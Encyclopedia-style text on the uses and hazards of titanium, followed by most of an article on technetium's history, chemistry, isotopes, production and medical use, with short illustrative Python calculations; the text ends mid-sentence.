Aerospace and marine Because titanium alloys have a high tensile-strength-to-density ratio, high corrosion resistance, fatigue resistance, high crack resistance, and the ability to withstand moderately high temperatures without creeping, they are used in aircraft, armor plating, naval ships, spacecraft, and missiles. For these applications, titanium is alloyed with aluminium, zirconium, nickel, vanadium, and other elements to manufacture a variety of components including critical structural parts, landing gear, firewalls, exhaust ducts (helicopters), and hydraulic systems. In fact, about two thirds of all titanium metal produced is used in aircraft engines and frames. The titanium 6Al-4V alloy accounts for almost 50% of all alloys used in aircraft applications. The Lockheed A-12 and the SR-71 "Blackbird" were two of the first aircraft frames where titanium was used, paving the way for much wider use in modern military and commercial aircraft. Large amounts of titanium mill products are used in the production of many aircraft (the following figures are the raw mill products consumed; only a fraction ends up in the finished aircraft): 116 metric tons in the Boeing 787, 77 in the Airbus A380, 59 in the Boeing 777, 45 in the Boeing 747, 32 in the Airbus A340, 18 in the Boeing 737, 18 in the Airbus A330, and 12 in the Airbus A320. In aero engine applications, titanium is used for rotors, compressor blades, hydraulic system components, and nacelles. An early use in jet engines was for the Orenda Iroquois in the 1950s. Because titanium is resistant to corrosion by sea water, it is used to make propeller shafts, rigging, heat exchangers in desalination plants, heater-chillers for salt water aquariums, fishing line and leader, and divers' knives. Titanium is used in the housings and components of ocean-deployed surveillance and monitoring devices for scientific and military purposes. The former Soviet Union developed techniques for making submarines with hulls of titanium alloys, forging titanium in huge vacuum tubes. Industrial Welded titanium pipe and process equipment (heat exchangers, tanks, process vessels, valves) are used in the chemical and petrochemical industries primarily for corrosion resistance. Specific alloys are used in oil and gas downhole applications and in nickel hydrometallurgy for their high strength (e.g., the titanium Beta C alloy), corrosion resistance, or both. The pulp and paper industry uses titanium in process equipment exposed to corrosive media, such as sodium hypochlorite or wet chlorine gas (in the bleachery). Other applications include ultrasonic welding, wave soldering, and sputtering targets. Titanium tetrachloride (TiCl4), a colorless liquid, is important as an intermediate in the process of making TiO2 and is also used to produce the Ziegler–Natta catalyst. Titanium tetrachloride is also used to iridize glass and, because it fumes strongly in moist air, it is used to make smoke screens. Consumer and architectural Titanium metal is used in automotive applications, particularly in automobile and motorcycle racing, where low weight and high strength and rigidity are critical. The metal is generally too expensive for the general consumer market, though some late-model Corvettes have been manufactured with titanium exhausts, and the Corvette Z06's LT4 supercharged engine uses lightweight, solid titanium intake valves for greater strength and resistance to heat. 
Titanium is used in many sporting goods: tennis rackets, golf clubs, lacrosse stick shafts; cricket, hockey, lacrosse, and football helmet grills; and bicycle frames and components. Although titanium is not a mainstream material for bicycle production, titanium bikes have been used by racing teams and adventure cyclists. Titanium alloys are used in spectacle frames that are rather expensive but highly durable, long-lasting, and lightweight, and that cause no skin allergies. Titanium is a common material for backpacking cookware and eating utensils. Though more expensive than traditional steel or aluminium alternatives, titanium products can be significantly lighter without compromising strength. Titanium horseshoes are preferred to steel by farriers because they are lighter and more durable. Titanium has occasionally been used in architecture. The Monument to Yuri Gagarin, the first man to travel in space, as well as the Monument to the Conquerors of Space on top of the Cosmonaut Museum in Moscow, are made of titanium for the metal's attractive color and association with rocketry. The Guggenheim Museum Bilbao and the Cerritos Millennium Library were the first buildings in Europe and North America, respectively, to be sheathed in titanium panels. Titanium sheathing was used in the Frederic C. Hamilton Building in Denver, Colorado. Because of titanium's superior strength and light weight relative to other metals (steel, stainless steel, and aluminium), and because of recent advances in metalworking techniques, its use has become more widespread in the manufacture of firearms. Primary uses include pistol frames and revolver cylinders. For the same reasons, it is used in the body of some laptop computers (for example, in Apple's PowerBook G4). In 2023, Apple launched the iPhone 15 Pro, which uses a titanium enclosure. Some upmarket lightweight and corrosion-resistant tools, such as shovels, knife handles, and flashlights, are made of titanium or titanium alloys. Jewelry Because of its durability, titanium has become more popular for designer jewelry (particularly, titanium rings). Its inertness makes it a good choice for those with allergies or those who will be wearing the jewelry in environments such as swimming pools. Titanium is also alloyed with gold to produce an alloy that can be marketed as 24-karat gold, because the 1% of alloyed Ti is insufficient to require a lesser mark. The resulting alloy is roughly the hardness of 14-karat gold and is more durable than pure 24-karat gold. Titanium's durability, light weight, and dent and corrosion resistance make it useful for watch cases. Some artists work with titanium to produce sculptures, decorative objects, and furniture. Titanium may be anodized to vary the thickness of the surface oxide layer, causing optical interference fringes and a variety of bright colors. With this coloration and chemical inertness, titanium is a popular metal for body piercing. Titanium has a minor use in dedicated non-circulating coins and medals. In 1999, Gibraltar released the world's first titanium coin for the millennium celebration. The Gold Coast Titans, an Australian rugby league team, award a medal of pure titanium to their player of the year. Medical Because titanium is biocompatible (non-toxic and not rejected by the body), it has many medical uses, including surgical implements and implants, such as hip balls and sockets (joint replacement) and dental implants that can stay in place for up to 20 years. 
The titanium is often alloyed with about 4% aluminium, or with 6% Al and 4% vanadium. Titanium has the inherent ability to osseointegrate, enabling use in dental implants that can last for over 30 years. This property is also useful for orthopedic implant applications. These applications benefit from titanium's lower modulus of elasticity (Young's modulus), which more closely matches that of the bone that such devices are intended to repair. As a result, skeletal loads are more evenly shared between bone and implant, leading to a lower incidence of bone degradation due to stress shielding and of periprosthetic bone fractures, which occur at the boundaries of orthopedic implants. However, titanium alloys' stiffness is still more than twice that of bone, so adjacent bone bears a greatly reduced load and may deteriorate. Because titanium is non-ferromagnetic, patients with titanium implants can be safely examined with magnetic resonance imaging (convenient for long-term implants). Preparing titanium for implantation in the body involves subjecting it to a high-temperature plasma arc, which removes the surface atoms, exposing fresh titanium that is instantly oxidized. Modern advancements in additive manufacturing techniques have increased the potential for titanium use in orthopedic implant applications. Complex implant scaffold designs can be 3D-printed using titanium alloys, which allows for more patient-specific applications and increased implant osseointegration. Titanium is used for the surgical instruments used in image-guided surgery, as well as wheelchairs, crutches, and any other products where high strength and low weight are desirable. Titanium dioxide nanoparticles are widely used in electronics and in the delivery of pharmaceuticals and cosmetics. Nuclear waste storage Because of its corrosion resistance, containers made of titanium have been studied for the long-term storage of nuclear waste. Containers lasting more than 100,000 years are thought possible with manufacturing conditions that minimize material defects. A titanium "drip shield" could also be installed over containers of other types to enhance their longevity. Precautions Titanium is non-toxic even in large doses and does not play any natural role inside the human body. An estimated 0.8 milligrams of titanium is ingested by humans each day, but most passes through without being absorbed in the tissues. It does, however, sometimes bio-accumulate in tissues that contain silica. One study indicates a possible connection between titanium and yellow nail syndrome. As a powder or in the form of metal shavings, titanium metal poses a significant fire hazard and, when heated in air, an explosion hazard. Water and carbon dioxide are ineffective for extinguishing a titanium fire; Class D dry powder agents must be used instead. When used in the production or handling of chlorine, titanium should not be exposed to dry chlorine gas, because it may result in a titanium–chlorine fire. Titanium can catch fire when a fresh, non-oxidized surface comes in contact with liquid oxygen. Function in plants An unknown mechanism in plants may use titanium to stimulate the production of carbohydrates and encourage growth. This may explain why most plants contain about 1 part per million (ppm) of titanium, food plants have about 2 ppm, and horsetail and nettle contain up to 80 ppm.
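Returning to the stress-shielding point in the medical section above: modelled crudely as two springs in parallel under equal strain, bone and implant share load in proportion to their Young's moduli. The sketch below uses rough textbook moduli (assumed values, not from this article): about 20 GPa for cortical bone, 110 GPa for a Ti-6Al-4V alloy, and 200 GPa for stainless steel.

```python
# Parallel-springs toy model of stress shielding: for equal cross-sections
# under the same strain, each member carries load in proportion to its
# Young's modulus E.
E_BONE = 20.0                                               # GPa, cortical bone (rough)
IMPLANTS = {"Ti-6Al-4V": 110.0, "stainless steel": 200.0}   # GPa, rough

for name, e_implant in IMPLANTS.items():
    bone_share = E_BONE / (E_BONE + e_implant)
    print(f"{name:>15}: bone carries ~{bone_share:.0%} of the load")
```

On this crude model the bone next to a titanium implant carries roughly 15% of the load versus about 9% next to steel, which is the qualitative reason titanium implants cause less stress shielding.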
Physical sciences
Chemical elements_2
null
30041
https://en.wikipedia.org/wiki/Technetium
Technetium
Technetium is a chemical element; it has symbol Tc and atomic number 43. It is the lightest element whose isotopes are all radioactive. Technetium and promethium are the only radioactive elements whose neighbours by atomic number are both stable. Nearly all available technetium is produced synthetically. Naturally occurring technetium is a spontaneous fission product in uranium ore and thorium ore (the most common source), or the product of neutron capture in molybdenum ores. This silvery gray, crystalline transition metal lies between manganese and rhenium in group 7 of the periodic table, and its chemical properties are intermediate between those of both adjacent elements. The most common naturally occurring isotope is 99Tc, in traces only. Many of technetium's properties had been predicted by Dmitri Mendeleev before it was discovered; Mendeleev noted a gap in his periodic table and gave the undiscovered element the provisional name ekamanganese (Em). In 1937, technetium became the first predominantly artificial element to be produced, hence its name (from the Greek τεχνητός (technetos), 'artificial', + -ium). One short-lived gamma ray–emitting nuclear isomer, technetium-99m, is used in nuclear medicine for a wide variety of tests, such as bone cancer diagnoses. The ground state of the nuclide technetium-99 is used as a gamma ray–free source of beta particles. Long-lived technetium isotopes produced commercially are byproducts of the fission of uranium-235 in nuclear reactors and are extracted from nuclear fuel rods. Because even the longest-lived isotope of technetium has a relatively short half-life (4.21 million years), the 1952 detection of technetium in red giants helped to prove that stars can produce heavier elements. History Early assumptions From the 1860s through 1871, early forms of the periodic table proposed by Dmitri Mendeleev contained a gap between molybdenum (element 42) and ruthenium (element 44). In 1871, Mendeleev predicted this missing element would occupy the empty place below manganese and have similar chemical properties. Mendeleev gave it the provisional name eka-manganese (from eka, the Sanskrit word for one) because it was one place down from the known element manganese. Early misidentifications Many early researchers, both before and after the periodic table was published, were eager to be the first to discover and name the missing element. Its location in the table suggested that it should be easier to find than other undiscovered elements. This turned out not to be the case, due to technetium's radioactivity. Irreproducible results German chemists Walter Noddack, Otto Berg, and Ida Tacke reported the discovery of element 75 and element 43 in 1925, and named element 43 masurium (after Masuria in eastern Prussia, now in Poland, the region where Walter Noddack's family originated). This name caused significant resentment in the scientific community, because it was interpreted as referring to a series of victories of the German army over the Russian army in the Masuria region during World War I; as the Noddacks remained in their academic positions while the Nazis were in power, suspicions of and hostility toward their claim to have discovered element 43 continued. The group bombarded columbite with a beam of electrons and deduced element 43 was present by examining X-ray emission spectrograms. The wavelength of the X-rays produced is related to the atomic number by a formula derived by Henry Moseley in 1913. 
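Moseley's 1913 relation is what let experimenters tie an X-ray line to atomic number 43. A minimal sketch of its Kα form follows; the hydrogen-like formula with a screening constant of 1 is the usual textbook approximation, so the energies are approximate, and the constants are standard physical values rather than figures from this article.

```python
# Moseley's law, K-alpha approximation: a hydrogen-like 2p -> 1s transition
# with the nuclear charge screened by one unit, E ≈ 13.6 eV · (3/4) · (Z−1)².
RYDBERG_EV = 13.6057   # hydrogen ground-state binding energy, eV
HC_EV_NM = 1239.84     # h·c in eV·nm

def k_alpha(z):
    """Approximate K-alpha energy (eV) and wavelength (nm) for atomic number z."""
    energy = RYDBERG_EV * 0.75 * (z - 1) ** 2
    return energy, HC_EV_NM / energy

for z in (42, 43, 44):   # molybdenum, element 43, ruthenium
    e, lam = k_alpha(z)
    print(f"Z = {z}: ~{e / 1000:.1f} keV, ~{lam * 1000:.1f} pm")
```

The predicted element-43 line falls between the molybdenum and ruthenium lines, which is exactly where a claimed signal had to sit to be credible.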
The team claimed to detect a faint X-ray signal at a wavelength produced by element 43. Later experimenters could not replicate the discovery, and it was dismissed as an error. Still, in 1933, a series of articles on the discovery of elements quoted the name masurium for element 43. Some more recent attempts have been made to rehabilitate the Noddacks' claims, but they are disproved by Paul Kuroda's study on the amount of technetium that could have been present in the ores they studied: it could not have exceeded of ore, and thus would have been undetectable by the Noddacks' methods. Official discovery and later history The discovery of element 43 was finally confirmed in a 1937 experiment at the University of Palermo in Sicily by Carlo Perrier and Emilio Segrè. In mid-1936, Segrè visited the United States, first Columbia University in New York and then the Lawrence Berkeley National Laboratory in California. He persuaded cyclotron inventor Ernest Lawrence to let him take back some discarded cyclotron parts that had become radioactive. Lawrence mailed him a molybdenum foil that had been part of the deflector in the cyclotron. Segrè enlisted his colleague Perrier to attempt to prove, through comparative chemistry, that the molybdenum activity was indeed from an element with the atomic number 43. In 1937, they succeeded in isolating the isotopes technetium-95m and technetium-97. University of Palermo officials wanted them to name their discovery panormium, after the Latin name for Palermo, Panormus. In 1947, element 43 was named technetium, after the Greek word technetos, meaning 'artificial', since it was the first element to be artificially produced. Segrè returned to Berkeley and met Glenn T. Seaborg. They isolated the metastable isotope technetium-99m, which is now used in some ten million medical diagnostic procedures annually. In 1952, the astronomer Paul W. Merrill in California detected the spectral signature of technetium (specifically wavelengths of 403.1 nm, 423.8 nm, 426.2 nm, and 429.7 nm) in light from S-type red giants. The stars were near the end of their lives but were rich in the short-lived element, which indicated that it was being produced in the stars by nuclear reactions. That evidence bolstered the hypothesis that heavier elements are the product of nucleosynthesis in stars. More recently, such observations provided evidence that elements are formed by neutron capture in the s-process. Since that discovery, there have been many searches in terrestrial materials for natural sources of technetium. In 1962, technetium-99 was isolated and identified in pitchblende from the Belgian Congo in very small quantities (about 0.2 ng/kg), where it originates as a spontaneous fission product of uranium-238. The natural nuclear fission reactor in Oklo contains evidence that significant amounts of technetium-99 were produced and have since decayed into ruthenium-99. Characteristics Physical properties Technetium is a silvery-gray radioactive metal with an appearance similar to platinum, commonly obtained as a gray powder. The crystal structure of the bulk pure metal is hexagonal close-packed, and crystal structures of the nanodisperse pure metal are cubic. Nanodisperse technetium does not have a split NMR spectrum, while the 99Tc NMR spectrum of hexagonal bulk technetium is split into nine satellites. Atomic technetium has characteristic emission lines at wavelengths of 363.3 nm, 403.1 nm, 426.2 nm, 429.7 nm, and 485.3 nm.
Unit cell parameters have been reported for orthorhombic Tc metal contaminated with carbon (a = 0.2805(4) nm, b = 0.4958(8) nm, c = 0.4474(5) nm for Tc-C with 1.38 wt% C, and a = 0.2815(4) nm, b = 0.4963(8) nm, c = 0.4482(5) nm for Tc-C with 1.96 wt% C). The metal form is slightly paramagnetic, meaning its magnetic dipoles align with external magnetic fields, but will assume random orientations once the field is removed. Pure, metallic, single-crystal technetium becomes a type-II superconductor below a critical temperature. Below this temperature, technetium has a very high magnetic penetration depth, greater than any other element except niobium. Chemical properties Technetium is located in group 7 of the periodic table, between rhenium and manganese. As predicted by the periodic law, its chemical properties are intermediate between those of these two elements. Of the two, technetium more closely resembles rhenium, particularly in its chemical inertness and tendency to form covalent bonds. This is consistent with the tendency of period 5 elements to resemble their counterparts in period 6 more than period 4 due to the lanthanide contraction. Unlike manganese, technetium does not readily form cations (ions with net positive charge). Technetium exhibits nine oxidation states from −1 to +7, with +4, +5, and +7 being the most common. Technetium dissolves in aqua regia, nitric acid, and concentrated sulfuric acid, but not in hydrochloric acid of any concentration. Metallic technetium slowly tarnishes in moist air and, in powder form, burns in oxygen. When reacting with hydrogen at high pressure, it forms the hydride TcH, and with carbon it forms the carbide TcC, with cell parameter 0.398 nm, as well as a nanodisperse low-carbon-content carbide with parameter 0.402 nm. Technetium can catalyse the destruction of hydrazine by nitric acid, a property due to its multiplicity of valencies. This caused a problem in the separation of plutonium from uranium in nuclear fuel processing, where hydrazine is used as a protective reductant to keep plutonium in the trivalent rather than the more stable tetravalent state. The problem was exacerbated by the mutually enhanced solvent extraction of technetium and zirconium at the previous stage, and required a process modification. Compounds Pertechnetate and other derivatives The most prevalent form of technetium that is easily accessible is sodium pertechnetate, Na[TcO4]. The majority of this material is produced by radioactive decay from [99MoO4]2−: [99MoO4]2− → [99TcO4]− + β− Pertechnetate ([TcO4]−) is only weakly hydrated in aqueous solutions, and it behaves analogously to the perchlorate anion, both of which are tetrahedral. Unlike permanganate ([MnO4]−), it is only a weak oxidizing agent. Related to pertechnetate is technetium heptoxide. This pale-yellow, volatile solid is produced by oxidation of Tc metal and related precursors: 4 Tc + 7 O2 → 2 Tc2O7 It is a molecular metal oxide, analogous to manganese heptoxide. It adopts a centrosymmetric structure with two types of Tc−O bonds with 167 and 184 pm bond lengths. Technetium heptoxide hydrolyzes to pertechnetate and pertechnetic acid, depending on the pH: Tc2O7 + 2 OH− → 2 [TcO4]− + H2O (basic conditions) Tc2O7 + H2O → 2 HTcO4 (acidic conditions) HTcO4 is a strong acid. In concentrated sulfuric acid, [TcO4]− converts to the octahedral form TcO3(OH)(H2O)2, the conjugate base of the hypothetical triaquo complex [TcO3(H2O)3]+. Other chalcogenide derivatives Technetium forms a dioxide, disulfide, diselenide, and ditelluride. An ill-defined Tc2S7 forms upon treating pertechnetate with hydrogen sulfide. It thermally decomposes into the disulfide and elemental sulfur.
Similarly, the dioxide can be produced by reduction of Tc2O7. Unlike the case for rhenium, a trioxide has not been isolated for technetium. However, TcO3 has been identified in the gas phase using mass spectrometry. Simple hydride and halide complexes Technetium forms the hydride complex [TcH9]2−. The potassium salt is isostructural with the rhenium analogue, K2[ReH9]. At high pressure, the formation of TcH1.3 from the elements has also been reported. The following binary (containing only two elements) technetium halides are known: TcF6, TcF5, TcCl4, TcBr4, TcBr3, α-TcCl3, β-TcCl3, TcI3, α-TcCl2, and β-TcCl2. The oxidation states range from Tc(VI) to Tc(II). Technetium halides exhibit different structure types, such as molecular octahedral complexes, extended chains, layered sheets, and metal clusters arranged in a three-dimensional network. These compounds are produced by combining the metal and halogen or by less direct reactions. TcCl4 is obtained by chlorination of Tc metal or Tc2O7. Upon heating, TcCl4 gives the corresponding Tc(III) and Tc(II) chlorides. The structure of TcCl4 is composed of infinite zigzag chains of edge-sharing TcCl6 octahedra. It is isomorphous to the transition metal tetrachlorides of zirconium, hafnium, and platinum. Two polymorphs of technetium trichloride exist, α- and β-TcCl3. The α polymorph is also denoted as Tc3Cl9. It adopts a confacial bioctahedral structure. It is prepared by treating the chloro-acetate Tc2(O2CCH3)4Cl2 with HCl. Like Re3Cl9, the structure of the α-polymorph consists of triangles with short M-M distances. β-TcCl3 features octahedral Tc centers, which are organized in pairs, as seen also for molybdenum trichloride. TcBr3 does not adopt the structure of either trichloride phase. Instead it has the structure of molybdenum tribromide, consisting of chains of confacial octahedra with alternating short and long Tc—Tc contacts. TcI3 has the same structure as the high-temperature phase of TiI3, featuring chains of confacial octahedra with equal Tc—Tc contacts. Several anionic technetium halides are known. The binary tetrahalides can be converted to the hexahalides [TcX6]2− (X = F, Cl, Br, I), which adopt octahedral molecular geometry. More reduced halides form anionic clusters with Tc–Tc bonds. The situation is similar for the related elements Mo, W, and Re. These clusters have the nuclearities Tc4, Tc6, Tc8, and Tc13. The more stable Tc6 and Tc8 clusters have prism shapes where vertical pairs of Tc atoms are connected by triple bonds and the planar atoms by single bonds. Every technetium atom makes six bonds, and the remaining valence electrons can be saturated by one axial and two bridging ligand halogen atoms such as chlorine or bromine. Coordination and organometallic complexes Technetium forms a variety of coordination complexes with organic ligands. Many have been well-investigated because of their relevance to nuclear medicine. Technetium forms a variety of compounds with Tc–C bonds, i.e. organotechnetium complexes. Prominent members of this class are complexes with CO, arene, and cyclopentadienyl ligands. The binary carbonyl Tc2(CO)10 is a white volatile solid. In this molecule, two technetium atoms are bound to each other; each atom is surrounded by an octahedral arrangement of five carbonyl ligands and the Tc–Tc bond. The bond length between technetium atoms, 303 pm, is significantly larger than the distance between two atoms in metallic technetium (272 pm). Similar carbonyls are formed by technetium's congeners, manganese and rhenium.
Interest in organotechnetium compounds has also been motivated by applications in nuclear medicine. Technetium also forms aquo-carbonyl complexes, a prominent example being [Tc(CO)3(H2O)3]+; such complexes are unusual compared to other metal carbonyls. Isotopes Technetium, with atomic number Z = 43, is the lowest-numbered element in the periodic table for which all isotopes are radioactive. The second-lightest exclusively radioactive element, promethium, has atomic number 61. Atomic nuclei with an odd number of protons are less stable than those with even numbers, even when the total number of nucleons (protons + neutrons) is even, and odd-numbered elements have fewer stable isotopes. The most stable radioactive isotopes are technetium-97, with a half-life of about 4.21 million years, and technetium-98, with about 4.2 million years; current measurements of their half-lives give overlapping confidence intervals corresponding to one standard deviation and therefore do not allow a definite assignment of technetium's most stable isotope. The next most stable isotope is technetium-99, which has a half-life of 211,100 years. Thirty-four other radioisotopes have been characterized with mass numbers ranging from 86 to 122. Most of these have half-lives that are less than an hour, the exceptions being technetium-93 (2.73 hours), technetium-94 (4.88 hours), technetium-95 (20 hours), and technetium-96 (4.3 days). The primary decay mode for isotopes lighter than technetium-98 (98Tc) is electron capture, producing molybdenum (Z = 42). For technetium-98 and heavier isotopes, the primary mode is beta emission (the emission of an electron or positron), producing ruthenium (Z = 44), with the exception that technetium-100 can decay both by beta emission and electron capture. Technetium also has numerous nuclear isomers, which are isotopes with one or more excited nucleons. Technetium-97m (97mTc; "m" stands for metastability) is the most stable, with a half-life of 91 days and excitation energy 0.0965 MeV. This is followed by technetium-95m (61 days, 0.03 MeV), and technetium-99m (6.01 hours, 0.142 MeV). Technetium-99 (99Tc) is a major product of the fission of uranium-235 (235U), making it the most common and most readily available isotope of technetium. One gram of technetium-99 produces about 620 million disintegrations per second (in other words, the specific activity of 99Tc is 0.62 GBq/g). Occurrence and production Technetium occurs naturally in the Earth's crust in minute concentrations of about 0.003 parts per trillion. Technetium is so rare because the half-lives of 97Tc and 98Tc are only a few million years. More than a thousand such periods have passed since the formation of the Earth, so the probability of survival of even one atom of primordial technetium is effectively zero. However, small amounts exist as spontaneous fission products in uranium ores. A kilogram of uranium contains an estimated 1 nanogram of technetium, equivalent to some ten trillion atoms. Some red giant stars of the spectral types S, M, and N display a spectral absorption line indicating the presence of technetium. These red giants are known informally as technetium stars. Fission waste product In contrast to the rare natural occurrence, bulk quantities of technetium-99 are produced each year from spent nuclear fuel rods, which contain various fission products. The fission of a gram of uranium-235 in nuclear reactors yields 27 mg of technetium-99, giving technetium a fission product yield of 6.1%.
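Both figures quoted above, the specific activity of technetium-99 and the mass of it produced per gram of uranium-235, can be sanity-checked from first principles. A rough sketch in Python; Avogadro's number and the approximate molar masses are standard constants assumed for the sketch, while the half-life and yield are the values given in the text:

import math

AVOGADRO = 6.02214e23
SECONDS_PER_YEAR = 3.156e7

# Specific activity of Tc-99: A = (ln 2 / t_half) * (atoms per gram)
t_half_s = 211_100 * SECONDS_PER_YEAR          # 211,100 years in seconds
atoms_per_gram = AVOGADRO / 99                  # molar mass ~99 g/mol
activity_bq_per_g = math.log(2) / t_half_s * atoms_per_gram
print(f"Tc-99 specific activity: {activity_bq_per_g / 1e9:.2f} GBq/g")  # ~0.63

# Mass of Tc-99 from fissioning 1 g of U-235 at a 6.1% fission yield
fissions = AVOGADRO / 235                       # atoms in 1 g of U-235
tc99_atoms = fissions * 0.061
tc99_mg = tc99_atoms * 99 / AVOGADRO * 1000
print(f"Tc-99 per gram of U-235 fissioned: {tc99_mg:.0f} mg")  # ~26 mg

The results, about 0.63 GBq/g and about 26 mg, agree with the quoted 0.62 GBq/g and 27 mg to within rounding.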
Other fissile isotopes produce similar yields of technetium, such as 4.9% from uranium-233 and 6.21% from plutonium-239. An estimated 49,000 TBq (78 metric tons) of technetium was produced in nuclear reactors between 1983 and 1994, by far the dominant source of terrestrial technetium. Only a fraction of the production is used commercially. Technetium-99 is produced by the nuclear fission of both uranium-235 and plutonium-239. It is therefore present in radioactive waste and in the nuclear fallout of fission bomb explosions. Its decay, measured in becquerels per amount of spent fuel, becomes the dominant contributor to nuclear waste radioactivity long after the creation of the waste, once the shorter-lived fission products have decayed. From 1945 to 1994, an estimated 160 TBq (about 250 kg) of technetium-99 was released into the environment during atmospheric nuclear tests. The amount of technetium-99 from nuclear reactors released into the environment up to 1986 is on the order of 1000 TBq (about 1600 kg), primarily by nuclear fuel reprocessing; most of this was discharged into the sea. Reprocessing methods have reduced emissions since then, but as of 2005 the primary release of technetium-99 into the environment is by the Sellafield plant, which released an estimated 550 TBq (about 900 kg) from 1995 to 1999 into the Irish Sea. From 2000 onwards the amount has been limited by regulation to 90 TBq (about 140 kg) per year. Discharge of technetium into the sea resulted in contamination of some seafood with minuscule quantities of this element. For example, European lobster and fish from west Cumbria contain about 1 Bq/kg of technetium. Fission product for commercial use The metastable isotope technetium-99m is continuously produced as a fission product from the fission of uranium or plutonium in nuclear reactors, via a chain such as: 238U → (spontaneous fission) → 137I + 99Y + 2 n 99Y → (β−, 1.47 s) → 99Zr → (β−, 2.1 s) → 99Nb → (β−, 15.0 s) → 99Mo → (β−, 65.94 h) → 99Tc → (β−, 211,100 y) → 99Ru Because used fuel is allowed to stand for several years before reprocessing, all of the molybdenum-99 and technetium-99m has decayed by the time that the fission products are separated from the major actinides in conventional nuclear reprocessing. The liquid left after plutonium–uranium extraction (PUREX) contains a high concentration of technetium as pertechnetate ([TcO4]−), but almost all of this is technetium-99, not technetium-99m. The vast majority of the technetium-99m used in medical work is produced by irradiating dedicated highly enriched uranium targets in a reactor, extracting molybdenum-99 from the targets in reprocessing facilities, and recovering at the diagnostic center the technetium-99m produced upon decay of molybdenum-99. Molybdenum-99 in the form of molybdate is adsorbed onto acid alumina (Al2O3) in a shielded column chromatograph inside a technetium-99m generator ("technetium cow", also occasionally called a "molybdenum cow"). Molybdenum-99 has a half-life of 67 hours, so short-lived technetium-99m (half-life: 6 hours), which results from its decay, is constantly being produced. The soluble pertechnetate can then be chemically extracted by elution using a saline solution. A drawback of this process is that it requires targets containing uranium-235, which are subject to the security precautions of fissile materials.
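The build-up of technetium-99m inside a generator between elutions follows the two-member Bateman equation for a parent–daughter pair. A minimal sketch in Python; the branching fraction of Mo-99 decays feeding the metastable state (taken here as about 87.5%) is a commonly cited value assumed for illustration, not stated in this article:

import math

T_MO99_H = 66.0   # Mo-99 half-life, hours (67 h is also quoted above)
T_TC99M_H = 6.01  # Tc-99m half-life, hours
BRANCH = 0.875    # assumed fraction of Mo-99 decays that populate Tc-99m

lam_mo = math.log(2) / T_MO99_H
lam_tc = math.log(2) / T_TC99M_H

def tc99m_activity(t_h: float, mo_activity_0: float = 1.0) -> float:
    """Tc-99m activity at t_h hours after a complete elution, per unit of
    initial Mo-99 activity, from the two-member Bateman equation."""
    return (BRANCH * lam_tc / (lam_tc - lam_mo) * mo_activity_0
            * (math.exp(-lam_mo * t_h) - math.exp(-lam_tc * t_h)))

# Tc-99m regrows after each elution and peaks roughly a day later:
for t in (6, 12, 23, 24, 48):
    print(f"t = {t:>2} h: Tc-99m activity = {tc99m_activity(t):.3f}")

With these half-lives the daughter activity peaks roughly 23 hours after an elution, which is why generators are typically "milked" about once a day.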
Almost two-thirds of the world's supply comes from two reactors: the National Research Universal Reactor at Chalk River Laboratories in Ontario, Canada, and the High Flux Reactor of the Nuclear Research and Consultancy Group in Petten, Netherlands. All major reactors that produce technetium-99m were built in the 1960s and are close to the end of life. The two new Canadian Multipurpose Applied Physics Lattice Experiment (MAPLE) reactors, planned and built to produce 200% of the demand for technetium-99m, relieved all other producers of the need to build their own reactors. With the cancellation of the already tested reactors in 2008, the future supply of technetium-99m became problematic. Waste disposal The long half-life of technetium-99 and its potential to form anionic species create a major concern for the long-term disposal of radioactive waste. Many of the processes designed to remove fission products in reprocessing plants aim at cationic species such as caesium (e.g., caesium-137) and strontium (e.g., strontium-90); hence the pertechnetate escapes those processes. Current disposal options favor burial in continental, geologically stable rock. The primary danger with such practice is the likelihood that the waste will contact water, which could leach radioactive contamination into the environment. The anionic pertechnetate and iodide tend not to adsorb onto the surfaces of minerals, and are likely to be washed away. By comparison, plutonium, uranium, and caesium tend to bind to soil particles. Technetium could be immobilized in some environments, for example by microbial activity in lake-bottom sediments, and the environmental chemistry of technetium is an area of active research. An alternative disposal method, transmutation, has been demonstrated at CERN for technetium-99. In this process, the technetium (technetium-99 as a metal target) is bombarded with neutrons to form the short-lived technetium-100 (half-life = 16 seconds), which decays by beta decay to stable ruthenium-100. If recovery of usable ruthenium is a goal, an extremely pure technetium target is needed; if small traces of the minor actinides such as americium and curium are present in the target, they are likely to undergo fission and form more fission products which increase the radioactivity of the irradiated target. The formation of ruthenium-106 (half-life 374 days) from the 'fresh fission' is likely to increase the activity of the final ruthenium metal, which will then require a longer cooling time after irradiation before the ruthenium can be used. The actual separation of technetium-99 from spent nuclear fuel is a long process. During fuel reprocessing, it comes out as a component of the highly radioactive waste liquid. After sitting for several years, the radioactivity reduces to a level where extraction of the long-lived isotopes, including technetium-99, becomes feasible. A series of chemical processes yields technetium-99 metal of high purity. Neutron activation Molybdenum-99, which decays to form technetium-99m, can be formed by the neutron activation of molybdenum-98. Other technetium isotopes are not produced in significant quantities by fission; when needed, they are manufactured by neutron irradiation of parent isotopes (for example, technetium-97 can be made by neutron irradiation of ruthenium-96). Particle accelerators The feasibility of technetium-99m production with the 22-MeV proton bombardment of a molybdenum-100 target in medical cyclotrons, following the reaction 100Mo(p,2n)99mTc, was demonstrated in 1971.
The recent shortages of medical technetium-99m reignited interest in its production by proton bombardment of isotopically enriched (>99.5%) molybdenum-100 targets. Other techniques are being investigated for obtaining molybdenum-99 from molybdenum-100 via (n,2n) or (γ,n) reactions in particle accelerators. Applications Nuclear medicine and biology Technetium-99m ("m" indicates that this is a metastable nuclear isomer) is used in radioactive isotope medical tests. For example, technetium-99m is a radioactive tracer that medical imaging equipment tracks in the human body. It is well suited to the role because it emits readily detectable 140 keV gamma rays, and its half-life is 6.01 hours (meaning that about 94% of it decays to technetium-99 in 24 hours). The chemistry of technetium allows it to be bound to a variety of biochemical compounds, each of which determines how it is metabolized and deposited in the body, and this single isotope can be used for a multitude of diagnostic tests. More than 50 common radiopharmaceuticals are based on technetium-99m for imaging and functional studies of the brain, heart muscle, thyroid, lungs, liver, gall bladder, kidneys, skeleton, blood, and tumors. The longer-lived isotope technetium-95m, with a half-life of 61 days, is used as a radioactive tracer to study the movement of technetium in the environment and in plant and animal systems. Industrial and chemical Technetium-99 decays almost entirely by beta decay, emitting beta particles with consistently low energies and no accompanying gamma rays. Moreover, its long half-life means that this emission decreases very slowly with time. It can also be extracted to a high chemical and isotopic purity from radioactive waste. For these reasons, it is a National Institute of Standards and Technology (NIST) standard beta emitter, and is used for equipment calibration. Technetium-99 has also been proposed for optoelectronic devices and nanoscale nuclear batteries. Like rhenium and palladium, technetium can serve as a catalyst. In processes such as the 